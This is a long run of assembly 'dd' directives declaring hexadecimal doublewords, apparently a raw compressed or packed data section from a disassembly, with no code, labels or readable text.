dd 0B0734F3h, 0C033CFEDh
dd 85D8B6CAh, 1D2CD6C9h, 4794B6DDh, 0FFCF1B05h, 0B701FB1Dh
dd 0F8098C88h, 28724CFFh, 0F6714892h, 9951FF79h, 4B456D25h
dd 39FF71BFh, 3D551D91h, 0FF697933h, 5D758941h, 61697D15h
dd 0A62916FFh, 7070460Ch, 932BFF84h, 2990392Ch, 19F69136h
dd 2175F52Fh, 69211DB7h, 357D55FFh, 3681495Dh, 9C74FF8Dh
dd 9D93872Fh, 8CFF3388h, 968930A7h, 0FF841347h, 417F1244h
dd 5D245EF7h, 29488ABBh, 0B756FF21h, 30064CE6h, 78FF70DAh
dd 6C64CE33h, 0FFEC28E1h, 7164BB63h, 0C961EE22h, 152961FFh
dd 270DF5BDh, 0F4E3FFB7h, 0C7EFDEB4h, 0F4FF65D0h, 0C5EDDACDh
dd 0F6F1990Dh, 0D59D11B9h, 0AAA1C218h, 0DDF509FFh, 3DD8ED9Ah
dd 942B93FFh, 0BE8E28C1h, 0AD14FF2Ah, 0ABA50D36h, 0A6FF1187h
dd 94A3F679h, 0FFADC0F7h, 0FDB52BFEh, 12F9BB5h, 0CDE1A9FDh
dd 0DFE5AD05h, 0AD5A0B36h, 0C8FF850Ah, 0FF9B0397h, 0FFC1B651h
dd 0DAA4DE74h, 0D6A0BAC0h, 6CB6C4FFh, 68C902D2h, 8EBCFFCEh
dd 4AFAEA54h, 0B4FFE650h, 98E23C86h, 0FFDE3882h, 7D449EACh
dd 0DB7A3D02h, 735838FFh, 8F276F4Bh, 4E64FB31h, 0FF044D74h
dd 3F198D72h, 1F6ADD42h, 1C63FFEDh, 46166037h, 12FFAC89h
dd 0EA84230h, 0FC945A05h, 258D3A2Dh, 71B9CE05h, 28137F3Dh
dd 7E3C917Fh, 881C34FFh, 0D5C92882h, 662CFF86h, 8B255050h
dd 4FFF8733h, 537B2F67h, 0FFEDF463h, 8180821Ah, 0C107285Eh
dd 1FEB36F8h, 0C097434Bh, 416F6E4Eh, 0FF6BC330h, 6C2A67D3h
dd 0BB755BCFh, 62F67E52h, 0FFFFEC22h, 8DB3C2FCh, 0FF6BF6C0h
dd 62F2CC52h, 1CEEC8CDh, 0CAF4AEFFh, 0C9EFDD24h, 0C3C6FFB9h
dd 9B5E38D4h, 9FFFE9BCh, 0A1959C9Bh, 0C1ED543Ch, 49BF2B32h
dd 3EF28F92h, 8CFFF72h, 0A9B8A5B7h, 0A6FFFE67h, 4CA29DA4h
dd 0FFC28515h, 0BA11FD9Fh, 0B7A8B7A7h, 0E90C0EFFh, 0B9B0AFC6h
dd 0C0BFB0Fh, 428E5805h, 29CFA7Fh, 0ED984B57h, 0FFBECCFEh
dd 0A0EC0AFFh, 4F415D7h, 87CFFF6Bh, 0CBF2F4AFh, 4DD20DEEh
dd 0D9FEAAEBh, 791870ADh, 0D0A50A66h, 57B7EFFh, 7493D660h
dd 7377FF41h, 0E41B6D74h, 6AFF35ACh, 4A504B74h, 0FF3B6FBAh
dd 445C43B2h, 4B403F42h, 20FFCDF0h, 3CFFBFB9h, 8014613Ch
dd 0A7D87BFFh, 2B2E3111h, 0E6BAFF36h, 27917C43h, 1DFF2423h
dd 45DC9462h, 0FFAD7E9Ah, 38A67B35h, 35122915h, 848A64FCh
dd 0B8E9122h, 8AFF85C3h, 9A14CA87h, 0FF167857h, 2AC9D57Ch
dd 1E3C4A80h, 6E7C54FFh, 6E8F4922h, 4DE5FF7Eh, 6C4A1105h
dd 8BFF6C49h, 665969CFh, 0FFF22763h, 0C9E4FB9Eh, 0F5FCFBFFh
dd 54DE83FFh, 0F5CBEA0Dh, 0EFF2FFEDh, 0AF925E99h, 0C5F0EEE8h
dd 0BF38C8CEh, 0DABD30C8h, 0C1FFC0C2h, 8147C99Eh, 0FFDF2BF6h
dd 2BBAC28Bh, 5AF9C68Eh, 0ADAF19D4h, 2CFDFE50h, 0FB02BD64h
dd 9FFFBFA5h, 0BF622EE0h, 2BFC18FFh, 0B61CF9B7h, 98B3FF8Fh
dd 1007E2B3h, 7CFF7B33h, 6E1305AEh, 0E9F9B162h, 0A49AD80Fh
dd 0E1DE0178h, 0D3B6A1DFh, 0D6FFD8A0h, 816ED4D3h, 0FF4DAC0Bh
dd 14BCF159h, 52E87AABh, 2424D8FFh, 0E0DFE335h, 6A6DFEE1h
dd 3A7681C0h, 69E63767h, 450FFFA5h, 1C313F70h, 56ED4BE1h
dd 0FFFFF94Bh, 0CD852393h, 41415742h, 371B1EFFh, 0AC73D6CAh
dd 13C7FE58h, 37410FABh, 4B5EDFA7h, 0FF172693h, 0A8683DB5h
dd 7ACDD423h, 212022FFh, 0E1A7883Eh, 7F8BFF56h, 8B53632Bh
dd 50F00E2Eh, 0D9235022h, 7F8C4AFFh, 0B451B95h, 0CFF4282h
dd 225C2981h, 0FC20AD13h, 0EC72CB56h, 0E41B8252h, 0E3CFD4Eh
dd 0BD846AD4h, 0D874FF8Fh, 5CFBC83Eh, 34DC01FCh, 128CD20Dh
dd 0D8C5D7FFh, 0DEFF87C9h, 0C2BDC4C6h, 0FE65352Ch, 31DDBFA2h
dd 3497C79Ah, 8F782FCFh, 20FAEFC7h, 0AD8AB18Dh, 0A83551B7h
dd 0B499ABFFh, 0A2FA0CA5h, 0BEA1FFA0h, 0D6812910h, 0ABD2FFB3h
dd 1EFF26A5h, 1EAE08B2h, 0DFFB3CFh, 69070A05h, 0F6D73A96h
dd 0FF0395A0h, 881AFCFFh, 7D6EE140h, 0CFBF96FFh, 0FF2BD065h
dd 9CFF1BD2h, 61681A94h, 0F3EEFFCFh, 0EA7A44FFh, 0A57640EBh
dd 5936FF42h, 6D844A6Dh, 73FF4E51h, 474A454Dh, 0FFDAD448h
dd 3D563817h, 69AEF877h, 0ED451CF3h, 48374B15h, 64FF7284h
dd 96D19F73h, 22FF45FCh, 122A3A84h, 0FF9E3780h, 2F8B8701h
dd 92876DBDh, 6F5AF7FFh, 0C98C842Eh, 5278FC32h, 7F831564h
dd 0AA3FF6Fh, 5661EAA0h, 0EE8FDF1Ah, 0FC4D5456h, 55C5A452h
dd 0FF6F6F12h, 0FF3C4279h, 0CE66435Ah, 65CA5DB6h, 0FFFFDAA5h
dd 33DD2A86h, 0E9C16514h, 0CA405FFFh, 0CED1F0F2h, 9157FF68h
dd 0BBEFDBA6h, 0DBFF8706h, 5E8E0ABEh, 0FA3DC1EAh, 9AE25A5Dh
dd 8B50DD98h, 3343BE3Fh, 17AEB028h, 0FF39A7FFh, 0AA05C463h
dd 43A4A9A4h, 0AE9EF8FFh, 0B5BD032Ah, 52B7FFBAh, 0A8C78A24h
dd 0A4FFAC06h, 1E11219Bh, 0F4CB300Dh, 8BC8089Ah, 4E9FFFDAh
dd 9A3705DFh, 0DAFFDCA4h, 85ECD8D7h, 0FF71A807h, 0B0D08093h
dd 0EC54EB44h, 0FFFFEA8Dh, 78B77389h, 0E0E23AD9h, 0C169F22Fh
dd 0CA7396FFh, 0E76D56Ah, 266CFF46h, 9A507A90h, 44FF6E2Ch
dd 3949484Ch, 5B6E4556h, 828D55B6h, 0A47FF18h, 9181A62h
dd 0C1FD9216h, 0A80B6E29h, 2CFFBF30h, 4403AF07h, 267E1DE5h
dd 936722FFh, 839742E5h, 0D805FF36h, 6529828Fh, 85FF403Bh
dd 0A671652Dh, 0FF8CA58Ch, 968630BCh, 0A283A588h, 17AD83FFh
dd 0CCDB6882h, 575BFF1Dh, 2994958h, 4EEB2968h, 7FFF1E28h
dd 6BCDEDC1h, 59FF6867h, 0F998F0B8h, 0FF5FB8E6h, 0C3045036h
dd 0C0DD69F7h, 0F3F6F8FFh, 4B678BF4h, 0F6D5FF0Ch, 0CAC5CCCEh
dd 5DFF4DE9h, 0C4DCB79Ah, 0FBC0BFC2h, 0A07F4D38h, 9F19FF39h
dd 0AE40D1FFh, 0FFF2AA14h, 65A61031h, 0D8A2FC25h, 0A1F7C2E1h
dd 0FDBB7FFFh, 0B4D39620h, 0B3B701FFh, 2427ADB4h, 0AAF5C86Ch
dd 9D17F5CEh, 0AAFFD6A7h, 9E4AD800h, 0FFB8BED4h, 2953C8A2h
dd 6111CC66h, 36E72FEh, 0E5EAE5ECh, 0E6FFA7ADh, 570DE4E3h
dd 0FFE57CBBh, 757C7E46h, 0AD5BE27Ah, 4C4F8AFFh, 706F7274h
dd 0FDDF5F9h, 0FF876930h, 4740FF44h, 1A64C520h, 5AFFCAC8h
dd 16AE09C4h, 0F0120D14h, 52F5836Dh, 3927E22Fh, 1B8FFFCBh
dd 247CB735h, 20FF1F22h, 40DFAD60h, 0FF387D99h, 8BD5E4BBh
dd 2F322D35h, 0B21CFAF8h, 0FF6F906Fh, 0CB7932CAh, 0B070B7C1h
dd 0DD2F3536h, 0FF2B315Ch, 49591F87h, 2AA5356h, 0F42B8EFFh
dd 0D46F5EF8h, 0FF6AB76Ch, 97FFF592h, 5DB5C1F8h, 0F56E4953h
dd 17FC6DFCh, 1624FFBEh, 0F605D7B6h, 0B1A5EDF8h, 305FCC60h
dd 0A7C6F07Ch, 0C5DBA0E3h, 0DABF7FFFh, 0C09F624Ch, 5694DEFFh
dd 288E232h, 9325FFF4h, 0E1B1908Fh, 0D1F1903Ah, 0BDA7B3A6h
dd 0A4FC9504h, 0DA0FF2Fh, 0C05FE02Dh, 1BFF5F19h, 0FFB40196h
dd 990ED4E5h, 130F26AFh, 1907B3FFh, 0F1FAAFD4h, 0C487FF2Ch
dd 1179FF89h, 0DDC2A306h, 0B0FFFFD5h, 0C8A7EA84h, 0B9FBCD66h
dd 0EE569550h, 6BB6BFFFh, 3C3F7A1Dh, 0FFE2E4D2h, 1F6DCBFCh
dd 0C80B5980h, 0FF89A59Dh, 45ECDFFFh, 7631256Dh, 0FF4C8D4Eh
dd 0FDCB95FAh, 0FFC65F1Ah, 0C2C425A2h, 33FF4120h, 3234FC6Ch
dd 0B8D2E0Bh, 488C6E5Dh, 0FFD46BFFh, 353D83FFh, 0F086373Ah
dd 9047EAA6h, 2DA3FF2Fh, 0FF24A550h, 168E86F1h, 1EFFB918h
dd 8211F3Fh, 0EEB161C0h, 8E5093FFh, 0B8FFFF77h, 66415A3Eh
dd 0D25CB6D7h, 33FF905Bh, 7CFF815Dh, 0EFC812A8h, 0E0CA001Bh
dd 47CAE10Dh, 0E452E7FFh
dd 7F449B7Eh, 0EDB43E26h, 93F1B78Ah, 8C1393C0h, 0B6FF1EFFh
dd 38A4B5A4h, 0C0FFFF08h, 0CD3762Ah, 0B3FF19F8h, 0CFE7AF0Bh
dd 0B71D1307h, 9440FFDBh, 37F0BF2Eh, 0FFF4FC16h, 0DBDFA9DEh
dd 7E96D5DCh, 0CAADF4F0h, 5F136A4Eh, 3DB1B6FFh, 0FFEDB753h
dd 74F587E7h, 8CD877BAh, 0DE834CFFh, 7FE474A3h, 0EA6FD555h
dd 73FF0D4Fh, 89C15947h, 0DA5B46CEh, 97FF3D45h, 0F61F028Eh
dd 171B5DB8h, 0C003FEFFh, 0A8B669C8h, 0A9D6312Dh, 4285FF52h
dd 18922FFFh, 1D037799h, 0A621F024h, 1C6F3C16h, 0FF368043h
dd 328CE97Eh, 9D725268h, 0FF36918Dh, 852D977Ch, 0B3FFD28Bh
dd 7FFF6C81h, 5F296036h, 55E25C5Bh, 345AFC53h, 4EFFDCF2h
dd 0DF7EB957h, 770A307Eh, 5A07867h, 6264FF2Ch, 0ED32605Fh
dd 0D9FD009Fh, 0F869F86Ah, 0DFFB932h, 42FC7F8Bh, 0CAE30D69h
dd 9114FF0Bh, 0DDCB9FA6h, 0FF978D9Bh, 4840F0F8h, 0FF9736E9h
dd 4D02CEFCh, 0DFAAA5EAh, 0B75A3683h, 0A3F5EB00h, 1160FF9Fh
dd 0B6C161DFh, 0A9DB26FAh, 0AD100101h, 76FFFF3Ch, 1A0AB462h
dd 0C106B0E2h, 0FFBDE6D4h, 497E2B8h, 0ADDBEE6Fh, 0B3F6E380h
dd 0C270FFD4h, 0D8FFA8B4h, 0FF17859Dh, 4DE29DF7h, 0E6DEADE5h
dd 91BD1BD9h, 401E9FFFh, 0FF768378h, 0AB61C17Eh, 0FF116D8Ch
dd 0EB609D92h, 0C45BFFFFh, 9FF3118h, 0A5B6153Eh, 0FF51450Dh
dd 2CFF2C04h, 0AE27909Ah, 7B5821FFh, 0AF2F621Eh, 3EFF1662h
dd 0BC4DF938h, 0DFFFF31h, 286FD21Eh, 0FE878B2Dh, 10107988h
dd 60659B8h, 5C70F9FFh, 7FC05C8Bh, 53795D86h, 22FF537Eh
dd 0F04372E7h, 0E5F72C9Dh, 0FF68D067h, 3BD73764h, 0CFBF65FCh
dd 0FBBDFCFFh, 0B8E9F8F7h, 928F8E0h, 5FF1C7D6h, 50F7CB70h
dd 0C4A3FF66h, 87D0B8F2h, 0B4D6BCD6h, 698BFFC1h, 19FF4169h
dd 0B327FF3Ah, 38ED52CCh, 0E8D0AAFFh, 0FA599912h, 9DF5EA12h
dd 0A19BDF7Eh, 0FEFD65A7h, 275D9AB8h, 2FAD16F6h, 7B68BFFh
dd 9EFFFF52h, 0F7DA1D8Dh, 281049Ch, 8DB27EFFh, 8679E03Fh
dd 0A1A9FF48h, 65ADC1C9h, 918C2ECDh, 6D997DFFh, 7CBF7ABDh
dd 370FF1DFh, 0BF17FFE3h, 0F107743h, 0E5FF6B3Fh, 0D66E4BF8h
dd 0F4E3F8FBh, 964D5C51h, 0E04FFF37h, 444BFC44h, 71C3DBB3h
dd 0FE51FF0Bh, 172DAEEFh, 0D0D1732h, 6F47CFFFh, 2A2CFF94h
dd 0B5372827h, 81C138D7h, 8AD8BF63h, 7DB1D620h, 38373BFFh
dd 0E8A0F329h, 7296E149h, 97BDFF9Fh, 0A08A32C1h, 110158FFh
dd 187BCC97h, 0FF5E60C2h, 93093AFCh, 0FF08F534h, 0FF2D48CFh
dd 66D06AF6h, 63BC8B76h, 9335F2FFh, 28CB62B7h, 0F4BEFFC8h
dd 0E8C21371h, 49FF0260h, 0D3C70F6Bh, 0E5F3C695h, 0FFA70FC7h
dd 0BFDB77D5h, 0C2D726D1h, 1C59D6E9h, 989572FFh, 263FC0FEh
dd 2488FB8Ch, 61E26BFFh, 0E09ABD75h, 0ECFF5FFFh, 0FFBA04DEh
dd 0B600DAE0h, 0B50BD6E4h, 0AFB2ADFFh, 0EF529E3Eh, 95CCFFA8h
dd 0FFA2007h, 0FF1D0206h, 0CAFF5BC4h, 0BE9EBCC0h, 4F5F3754h
dd 0FFFF2DD3h, 0F367CF01h, 0E6FC2C57h, 36EAFBE2h, 84B2FF5Fh
dd 3AFFDD36h, 0E1496946h, 0FA4204E7h, 7669787Ah, 8E8A1790h
dd 5048FF6Bh, 0AA4C4B4Eh, 24FFE3CFh, 44D3873Dh, 0C6763C56h
dd 0FF766A20h, 3C145E0Dh, 0AD176102h, 38FFFF13h, 8A55CC84h
dd 6F252D93h, 0FAB48FFFh, 761837FFh, 1932E91Ch, 3D16F621h
dd 0E1FE2A1Fh, 1AFF3438h, 85FFC7DEh, 0BDF0FF42h, 0BE150308h
dd 41F8FF0Ch, 0C35E2983h, 8442FFB7h, 477A64F9h, 2F7F1BAAh
dd 6C78D6A1h, 5DFF7765h, 0E5FDE990h, 0E9C97424h, 38FF1F44h
dd 0FF9FFF5Eh, 0CFFFE0B2h, 0E60E4EE1h, 0FCC8C7CAh, 0FBC6C850h
dd 0FF0BC3D5h, 5384FFC1h, 3F9BC634h, 37FF943Dh, 3B8D9487h
dd 0FCA591BDh, 3774016Fh, 4468EA6Ah, 0BDF15D5Fh, 0CA8969B1h
dd 548D7F5Dh, 9DBAA414h, 0EE54A6E2h, 8C23FDFh, 4FFA15B1h
dd 0A20EB28Bh, 9191AE5Fh, 0EC4693BBh, 73808DFFh, 7E8407E4h
dd 67295FFh, 0A3B9B8D8h, 0F78BC14Dh, 7CB4EDBCh, 58E56E90h
dd 8325B64Fh, 7F97FF17h, 958037FFh, 743E6E63h, 0E7AA501h
dd 463876FCh, 1BAA8E73h, 31F86EFFh, 60924DD6h, 0D2A902B7h
dd 7AC2F6F6h, 0ACE5FF8Dh, 787EE3CFh, 0AB78C5BAh, 0FF918414h
dd 0B5E495FDh, 1860BA2Ch, 1A22E1FFh, 5C6A7FFFh, 8BFDB72Ah
dd 0A49596FFh, 729C8A58h, 2083FF90h, 8A3755B6h, 10FF62FDh
dd 5455496Fh, 0FFE06253h, 956A8B4Ch, 494A4B47h, 42BAD7FFh
dd 3FA59029h, 4103FFBEh, 1B4B3B53h, 6FD40F9Fh, 0DF11AA17h
dd 23F2225Dh, 161BFF2Eh, 2E70E26h, 57E24802h, 5F821F0Dh
dd 5A1207C8h, 0C318E581h, 0FC490215h, 799E3F00h, 0C81B51F3h
dd 0C674FF44h, 3DC4CBDh, 0A0FF6956h, 0A40EE227h, 0F5F6E6CDh
dd 0D591DAFEh, 0C11B70BFh, 0FF6703D1h, 0D04FCC4Eh, 7E7D856h
dd 0BE3768FFh, 0E2E3E468h, 9BD7FF12h, 1BC9E1DAh, 28DEFFFh
dd 0D4D8FAE7h, 5F37D2D3h, 0B9E90AD2h, 2F73FDB0h, 12E01CDDh
dd 14BD864Bh, 74D0C806h, 0B697CBBFh, 0B7AB21h, 46FE9206h
dd 278C159Eh, 0FF4F8591h, 0C4561DABh, 9F8DAA23h, 0A1A2A3FEh
dd 1FA90F4h, 25FFA4ADh, 6F352D99h, 0A331219Ah, 0BF444AF6h
dd 8A542DD2h, 88FF898Ah, 7029FDC6h, 1464AACFh, 0BF85C852h
dd 855637F8h, 0B7A07690h, 0FF038EC8h, 0E3536C75h, 2F71446Bh
dd 15793FFFh, 8313F33Bh, 8B478D47h, 1A5B73FEh, 5846F64Ah
dd 49E2FFC6h, 22A833FFh, 3D6B2829h, 3F40FF41h, 17F82AD6h
dd 12FF520Eh, 3EFE166Ah, 0FAAF5206h, 9211940Dh, 39C35F19h
dd 632613DBh, 10FF9AFFh, 0C8B0817Ah, 0FEEC86ACh, 0C0A2B0ACh
dd 97110D7Bh, 0FF7A919Ah, 0E29EA7C8h, 42BD88A5h, 0FF252C85h
dd 0F5890001h, 0DFF7D861h, 0A959CFFFh, 34ACF60Bh, 0CA5AFF09h
dd 0D1D60EC2h, 0E0FFD0B6h, 0E5E6E6C0h, 0FF5389E4h, 86E3DC05h
dd 0DADBD705h, 0B82DD9FFh, 0E0D8F9B2h, 0C8DEFFD4h, 0C7C0CB9Fh
dd 0DFFF0FE6h, 0BAF9E7FFh, 0FFA410C4h, 0BBADA050h, 1FF1B74Eh
dd 7D568FFFh, 0B3B4B8CEh, 471BFFB2h, 99912A6Bh, 83FED189h
dd 0C55D857Dh, 0FFDFA28Ch, 0C1956CA0h, 0A697F8FFh, 0B496C72Ah
dd 938FFFFDh, 0A0049192h, 20FF11EAh, 0F9F61C78h, 0FE38835Ch
dd 6200AF1Fh, 97F67EC9h, 0FF43E4BBh, 9B4C5592h, 72642F6Ah
dd 0C1D2D08Dh, 0DCBF45ADh, 453D4B99h, 3156FF57h, 75A3C941h
dd 86FF1D5Eh, 6C7FF657h, 89706CF0h, 0BF7FE490h, 4D6DC551h
dd 9787FF40h, 47C19C4Ah, 0EBFF889Bh, 55413B82h, 0EC1DF51Dh
dd 0FFFB3AA9h, 0EDF22F7Fh, 0EAA430A1h, 5F4C1C08h, 0FC78ECC1h
dd 44F4F500h, 0F32C04F0h, 378C285Eh, 0FF79E9FCh, 9E16B04Bh
dd 9777FE0Fh, 310910F0h, 9CDC6F80h, 0DCFFA838h, 0D0A494A0h
dd 0FFE090E4h, 0DCACD814h, 0D6CF5E8h, 152DD5E1h, 0FDAB40FFh
dd 8B7F7FD2h, 0E931C9D9h, 0E6779BFFh, 0C7E3D428h, 0ACB8FCC7h
dd 0BB2BDBF3h, 0B70FFF2Fh, 0D4C7FA09h, 37B8CDE0h, 6FED25BCh
dd 1DE9194Eh, 0E5FDE5FEh, 0EAC2BFFFh, 0BBD3E8DFh, 836F9BCBh
dd 0F125F6B8h, 0B2226FB5h, 0CE82BFBFh, 0F632A796h, 7CA88F65h
dd 70FBFF66h, 3D35CF9Dh, 0D7C4FF0Fh, 32329A2Ah, 1EFFF6CAh
dd 0FA32661Eh, 0ED2E622Ah, 54E8676h, 5B637BFCh, 4BC25CC8h
dd 7EFF95CEh, 7B8D80EFh, 0FFD94C5Fh, 417560B6h, 13398351h
dd 566E5DFFh, 428A2E66h, 9D5FF842h, 5CEC5F2Eh, 0BF3F17FFh
dd 6F7F3BABh, 6B37FF8Fh, 0B7AF4363h, 6FFFA757h, 0CA354BC3h
dd 0FF7F5F8Fh, 0A0939B67h
dd 0F72767A5h, 35FF1F8Ch, 0F2346F6Fh, 52318324h, 0BF3E3F70h
dd 0FD1F2BFFh, 45FFDD05h, 59001F1h, 0FF5DBDB5h, 1AB057ACh
dd 5778B2B2h, 8F94FF7Fh, 54A8FF84h, 9574AD0h, 3DDBA5DDh
dd 0F5B5EEA5h, 6FDD1583h, 9AFA292Fh, 2AD2FD12h, 0C6FEBED6h
dd 0ECCA2C2Fh, 0E6D6FFF1h, 0C2C20AAEh, 0AEFFC0F5h, 0CA586C6Eh
dd 0FABE92FAh, 1544D706h, 0C9F037FDh, 0D2E1FF9Ah, 0CFBC14E3h
dd 0CCFF40F1h, 0E8F8DCB8h, 0FF15B91Ch, 50B2E111h, 0BDBD9DD5h
dd 869929FFh, 1C95CDEEh, 0A86FDDEBh, 48E06AFFh, 0A7DFA696h
dd 7BA7AE3Ch, 700BA8FFh, 34007084h, 0F1670621h, 0BFF96939h
dd 215F87FFh, 0FF6F2392h, 0FFB01D20h, 1C4F8B03h, 8570C600h
dd 732151F2h, 0FF6EC2E5h, 925A7EFFh, 387B8C52h, 0D7736AFCh
dd 6E8F4737h, 5F3195FFh, 0E83BAAA7h, 727315FFh, 28311B6Ch
dd 0C640FF33h, 5F8E2B18h, 5EFF2318h, 31377211h, 0FF223246h
dd 56314072h, 5EF1632Bh, 33E443E1h, 68CC7F51h, 58117E33h
dd 0BFCE2CD0h, 41F2C8D2h, 26FEC31h, 0FF3147F2h, 1462323Eh
dd 431E8E30h, 2651FCFFh, 49A98C32h, 1771B672h, 7B415921h
dd 3F11E02Fh, 2F3C5570h, 2FD41156h, 0DC11F6F8h, 1DFF52Fh
dd 0DCE5442Fh, 0D60B30FEh, 3EF04C32h, 0D8A5EE96h, 5195C91Dh
dd 0D12027DFh, 0FB203216h, 0D17E2F1Ch, 33B74724h, 8C5B0D7Ch
dd 72FFC67Fh, 46202C48h, 0BB11602Fh, 313E833Eh, 117C7F6Fh
dd 3138C86Ch, 0C7402BFFh, 0B6606358h, 602B48FEh, 963448C3h
dd 0AC983FDFh, 42FF2F16h, 3135F0E1h, 0B7062F24h, 51FE4751h
dd 342F14F7h, 44FF7744h, 3C329C2Fh, 6F771C30h, 0FFFE43D8h
dd 4E2BE811h, 9033E819h, 7D859DBh, 0F1461085h, 860C338h
dd 0E281DEC2h, 668006Ah, 3EE8D1AEh, 2E119754h, 6C6C64FFh
dd 0F94F4300h, 436FE295h, 0AA27D887h, 799A805Fh, 57FF534Eh
dd 45310D12h, 0D4EF6833h, 0B062FFDAh, 8B4624C7h, 4DDA74B6h
dd 0FFBF978Bh, 0C1858DFFh, 0FFFFD4EEh, 0C9A09864h, 5CD5149Bh
dd 6A5D19BEh, 0BB11A307h, 0CC3ED66h, 0D9005891h, 6231319Dh
dd 80748445h, 0A38001A5h, 1BCEF997h, 0AD841580h, 0AA345A1Bh
dd 6AA5A772h, 0B0991616h, 0FF2743A1h, 0A94901D0h, 59E87D14h
dd 95F2B0FEh, 53AD9414h, 50C0C02Bh, 4F404352h, 1505054h
dd 39544648h, 0AF0A104Ah, 0FC86A8E8h, 0D81901B0h, 0C4687A41h
dd 0BA773580h, 8000877Dh, 62AA2512h, 44165564h, 880F857Fh
dd 8D01B267h, 408BF8AAh, 6A480A0Ch, 0A677003h, 0FEAB6648h
dd 206083h, 0E00237E9h, 6A94141Eh, 82713612h, 161DEB1Ch
dd 55F884DBh, 45B054D1h, 0C283126Ch, 2276249Bh, 273B4C4Ch
dd 0D41AF3h, 46B8505Ch, 387B966Fh, 0DC802EDCh, 0BD6A7249h
dd 0B3D16320h, 0A70DF15Bh, 12BA56F8h, 1022DE0Dh, 2753BF32h
dd 4C80890Fh, 3E82D7A4h, 0A8087A83h, 0DCF0A42Dh, 14000000h
dd 8B07E191h, 520452C0h, 830F41DDh, 416C5062h, 0AFE4EC7h
dd 8F05938Ch, 0BABCB60Ch, 0A8FB0860h, 0ABBB6A9h, 0ECBABB0Fh
dd 0CB8AABDh, 8B89AD7Fh, 0FD9C9E8Dh, 9ABB8D9Ah, 6B69689h
dd 0BA7F13CFh, 0BBA7A9B8h, 1BD64850h, 0B0B20716h, 0B5FB192h
dd 9AADFFFFh, 91909298h, 9EFF93BCh, 0B9FF8C8Ch, 649A9396h
dd 8AACFF0Ch, 9AB2949Ch, 0EDBE27D9h, 18B2B6AFh, 908B96FFh
dd 86BDDF8Dh, 90ADEDDFh, 9EF60A97h, 73ABFF9Dh, 9EB201B7h
dd 0B99196EDh, 0D92B717h, 9EDB9BB6h, 0F49B0BA8h, 0FFFF8890h
dd 5F13E690h, 2240E449h, 0F7A45025h, 0F69FA0DDh, 0A1384717h
dd 83699347h, 5B2C20DDh, 3D26A06h, 5B40DC50h, 0D656A968h
dd 270B2422h, 6332407Dh, 59550DFh, 49040000h, 0F63F104Eh
dd 7E804616h, 82751B4Bh, 2855248Bh, 590A6ABCh, 5A24827Ch
dd 3E801C8Ah, 0E068A50Dh, 89FFFFFCh, 0AE2E225Fh, 225A9208h
dd 24820056h, 0DF34285Bh, 0FF7F80E8h, 9A827500h, 318A6124h
dd 1056B76Ch, 8D14D564h, 999DA3A2h, 20E853Fh, 24008200h
dd 202500DAh, 6D92B7A0h, 0FFFFC1FFh, 5A547212h, 4904C443h
dd 0C7691574h, 4410A819h, 0E9477891h, 0FFF248E0h, 6A8A0141h
dd 6570C889h, 8B582486h, 0F01B047h, 6A003C50h, 0A4D16550h
dd 65011D3Ch, 0C1221F9Bh, 67656487h, 86DE02DFh, 0AC0818F4h
dd 0F71FDD9Dh, 0C00F00B0h, 7274270h, 2D0348B7h, 0D456047Ch
dd 58115F5Ch, 0B50F7BC8h, 9E010168h, 0C6F0019Ch, 46C12F86h
dd 94EE7D58h, 0B6B1367Bh, 10E5B181h, 40C083D8h, 5818CA37h
dd 0D2D9DB9h, 1F4B0F88h, 744610B1h, 111D6A27h, 5B11B36Dh
dd 0C17A0EB1h, 0FD9BA065h, 486DA009h, 8A2659DDh, 0AA760FA3h
dd 55E1960h, 0D81FB1EBh, 4E285758h, 0A5B550Fh, 83C1A242h
dd 1D601A2h, 0C6127575h, 0F7C15589h, 0EE2555B2h, 88100EF2h
dd 0C25549CCh, 6C41FF01h, 0F0023E15h, 17230C5Ah, 909060F1h
dd 0E228089h, 62DE096Ah, 4FB068Ch, 78417949h, 48225050h
dd 0FFE0016Fh, 60897855h, 2A582E22h, 1F80E9ACh, 1067C361h
dd 0EE8D40AAh, 0B52505FEh, 808DA550h, 0A5DBC625h, 0FD050573h
dd 5E74B5Eh, 178F1220h, 0B7944A36h, 0D2D71146h, 59339DAh
dd 5261CEEh, 0D17C739h, 2EA3F5FDh, 0E66F8D9Bh, 6FCC99CEh
dd 339D2D05h, 490599EEh, 6805FB17h, 5420A5Ch, 730A666Ch
dd 91481988h, 57C0CDDh, 0A1395D9h, 0C5BE833h, 28ED5E5Bh
dd 77558D75h, 44057242h, 0F21114B1h, 3914F86Dh, 2CC99CFEh
dd 69B805C7h, 2EB37C18h, 26BECA77h, 0DFE31CB3h, 39664C05h
dd 0BD2E2BC6h, 1621058Ch, 62C04CF7h, 0A816BCECh, 9C69EA7Dh
dd 1B1CAEA1h, 0E5221FBBh, 53FE418h, 0A39058E5h, 369059CEh
dd 0B83B0A7Bh, 80B68504h, 0B83E6117h, 0D65A5357h, 8FED5932h
dd 3D7505CEh, 3D05AE9Dh, 0AF053AECh, 13357F1Dh, 8D456847h
dd 3F10B6BAh, 7E3105DFh, 632C7E74h, 5FC8E2Fh, 0C04663ECh
dd 17F7009Bh, 301DBA7Fh, 0F648FF80h, 0D1F89B8Dh, 5EF09F9h
dd 0CD1C184Eh, 0B1660327h, 0FFED4518h, 0FBEAB660h, 13F3A3B6h
dd 477C05A6h, 0AD4C27E7h, 984FFB6Dh, 0BA186C05h, 11943DFFh
dd 0BA8D2037h, 0DE4A10BFh, 309F9D05h, 50DF0CA5h, 0F63D5219h
dd 0CB988580h, 84FCFE11h, 620534A9h, 0F77C1869h, 0AD367F7Fh
dd 1CD2DA45h, 0A545D805h, 34BF2B5Bh, 0BFAB73ADh, 0B9257019h
dd 0BA0541B6h, 75543ACFh, 0BFB05BB6h, 0C0E64ADFh, 1C63C805h
dd 0D5070F88h, 3C9C0A63h, 69BC8EDEh, 8E10F369h, 1119F812h
dd 6934F04Bh, 6ADD2A0h, 0B9E0DA58h, 6042E605h, 551A27EFh
dd 0F98B35FBh, 74BA8461h, 0A96F0734h, 91A6405h, 1AC63B00h
dd 0CFDE26EEh, 0CB925C27h, 0DB1C7253h, 0E44AEE78h, 0F6B81AB1h
dd 9479EBDEh, 374FB68Fh, 0DDBFC016h, 0BF8C6F4Fh, 0DEE78105h
dd 0D9D90518h, 0E438B81Bh, 0CE0B471Bh, 3AF7DA6Dh, 971BEB1Ch
dd 0BDCF7F05h, 0F2052E31h, 7DB42263h, 0A8CFFB3h, 1C08FBC8h
dd 0C64B26BEh, 89FBFF0Ah, 1C0A72h, 3794D201h, 0A2C92BF0h
